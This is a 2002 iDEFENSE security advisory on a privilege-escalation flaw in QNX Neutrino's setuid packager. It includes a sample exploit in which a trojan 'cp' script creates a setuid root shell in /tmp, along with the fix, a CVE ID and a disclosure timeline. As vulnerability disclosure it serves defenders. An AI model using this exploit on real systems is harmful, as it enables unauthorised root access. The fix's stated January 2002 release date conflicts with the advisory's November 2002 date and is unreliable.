-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
iDEFENSE Security Advisory 11.08.02b: http://www.idefense.com/advisory/11.08.02b.txt Non-Explicit Path Vulnerability in QNX Neutrino RTOS November 8, 2002
QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. "Companies worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on the QNX technology for network routers, medical devices, intelligent transportation systems, safety and security systems, next-generation robotics, and other mission-critical applications. In addition, QNX forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an engineering concept vehicle. The new system supports the development of next-generation in-car communications, infotainment, and telematics applications." More information is available at http://www.qnx.com/products/ps_neutrino .
Since a setuid root application packager within QNX inappropriately executes external applications without using their full paths, local attackers can potentially obtain root privilege. The following is a sample exploit (with comments):
The packager will at one point call the copy binary (cp). The first step is to create a tainted copy command and ensure it is executable. This copy command will copy a shell to /tmp and give the shell setuid privilege:
$ cat > cp <<EOF > #!/bin/sh > /bin/cp /bin/sh /tmp/sh > chmod 4755 /tmp/sh > EOF $ chmod 755 cp
The attacker then modifies the PATH environment variable to search the current working directory before anything else:
The attacker now creates a directory and calls the packager on that created directory:
$ mkdir temp $ packager temp ...
The packager will ask a number of questions. When the procedure is complete, a root shell will be waiting for the attacker:
$ ls -l /tmp/sh - -rwsr-x r-x 1 root 100 153908 May 11 05:36 /tmp/sh
Local attackers that exploit this vulnerability can potentially gain total control over a targeted system. The fact that exploitation must be done locally makes it more unlikely that damage can be done quickly or in a widespread fashion. Still for organizations that may still be making use of QNX, insider threat is still a real danger.
QNX Neutrino RTOS 6.2.0 is affected. Re-create the above-described exploit scenario to determine susceptibility of a RTOS implementation.
Use the command chmod -s 'which packager' to remove the setuid bit from the packager binary.
VI. VENDOR FIX
QNX Neutrino RTOS 6.2.1, which is slated to be released in January 2002, should fix this vulnerability. According to QNX, concerned customers can contact their sales rep for an advance copy.
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1239 to this issue.
VIII. DISCLOSURE TIMELINE
10/02/2002 Issue disclosed to iDEFENSE 10/31/2002 QNX notified (firstname.lastname@example.org) 10/31/2002 iDEFENSE clients notified 11/01/2002 Response received from Marcin Dzieciol (email@example.com) 11/07/2002 Response received from Rodney Dowdell 11/08/2002 Phone conversation with Barry Faubert, Tech Support 11/08/2002 Public disclosure
Texonet (http://www.texonet.com) discovered this vulnerability.
Get paid for security research http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories: send email to firstname.lastname@example.org, subject line: "subscribe"
iDEFENSE is a global security intelligence company that proactively monitors sources throughout the world — from technical vulnerabilities and hacker profiling to the global spread of viruses and other malicious code. Our security intelligence services provide decision-makers, frontline security professionals and network administrators with timely access to actionable intelligence and decision support on cyber-related threats. For more information, visit http://www.idefense.com.
David Endler, CISSP Director, Technical Intelligence iDEFENSE, Inc. 14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071
-----BEGIN PGP SIGNATURE----- Version: PGP 7.1.2 Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A
iQA+AwUBPcwmZUrdNYRLCswqEQIZkQCYq0OO58lTS6Ib+q26PSx085XXqgCfWPhd F5wgy3retkUyneTrZbtG4pk= =rZxj -----END PGP SIGNATURE-----